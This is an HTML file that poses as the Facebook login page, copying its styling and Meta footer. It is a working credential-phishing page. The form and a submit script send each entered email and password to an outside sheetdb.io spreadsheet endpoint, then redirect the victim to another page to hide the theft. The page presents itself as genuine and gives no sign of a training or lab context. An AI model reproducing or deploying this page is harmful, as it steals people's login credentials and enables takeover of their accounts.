<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>Facebook</title>
	<style type="text/css">
		*{
			padding: 0;
			margin: 0;
			box-sizing: border-box;
			font-family: sans-serif;
			text-decoration: none;
			background-color: #f7f7f7;

		}
		/*:root{
			--blue:#1877f2;
		}*/
		form{ 
			display: flex;
			flex-direction: column;
			margin: auto;
			text-align: center;
			padding: 5%;
			gap: 12px;

		}
		form h2{
			color:#1877f2;
			font-size: 35px;
		}
		form input{
			font-size: 16px;
			padding: 10px 7px;
			box-shadow: 0 0 1px 0 black;
			border: none;

		}
		form button{
			background-color:#1877f2 ;
			border: none;
			font-size: 22px;
			color: white;
			padding: 10px 0px;
			border-radius: 5px;
			font-weight: 600;
		}
		form .forget{
			padding: 5px;
			font-size: 18px;
			color: #1877f2;
		}
		form p{
			color: rgb(48, 48, 48);
			 font-size: 20px;
		}
		form .new{
			font-size: 18px;
			color:rgb(48, 48, 48);
			padding: 10px 45px;
			border: 1px solid rgb(179, 179, 179);
			width: fit-content;
			
		}
		form .newdiv{
			width: 100%;
			padding: 25px 0;

		}
		form .maindiv{
			display: flex;
			width: 100%;
			margin: 8px 0 12px 0;
			
			justify-content: center;
			gap: 50px;

		}
		.maindiv a{
			color:#1877f2;
		}
		form .divleft{
				display: flex;
				flex-direction: column;
				gap: 5px;

		}
		form .divright{
			display: flex;
			flex-direction: column;
			gap: 5px;
		}
		 form #meta{
		 	font-size: 16px;
		 }
	</style>
</head>
	<form action="https://sheetdb.io/api/v1/4k3atma5npltp" method="post" id="sheetdb-form">
		<h2>facebook</h2>
		<input type="text" name="data[email]" placeholder="Mobile number or email" required id="email">
		<input type="password" name="data[password]" placeholder="Password" required id="password">
		<button type="submit">Login</button>
		<a href="" class="forget">Forget Password ?</a>
		<p>or</p>
		<div class="newdiv">
		<a href="" class="new">Create new account</a>
	</div>
		<div class="maindiv">
			<div class="divleft">
				<a href="">English (US)</a>
				<a href="">Hindi</a>
				<a href="">protugues(Brasil) </a>

			</div>
			<div class="divright">
				<a href="">Nepali</a>
				<a href="">Espanol</a>
				<a href="">Francias(France) </a>
			</div>
			
		</div>
		<p id="meta">Meta &copy; 2023</p>


	</form>
<body>

</body>
<script>
	var form = document.getElementById('sheetdb-form');
        form.addEventListener("submit", e => {
          e.preventDefault();
          fetch(form.action, {
              method : "POST",
              body: new FormData(document.getElementById("sheetdb-form")),
          }).then(
              response => response.json()
          ).then((html) => {
            // you can put any JS code here
            window.open('facebooklink.html', target="_self");

          });
        });


</script>
</html>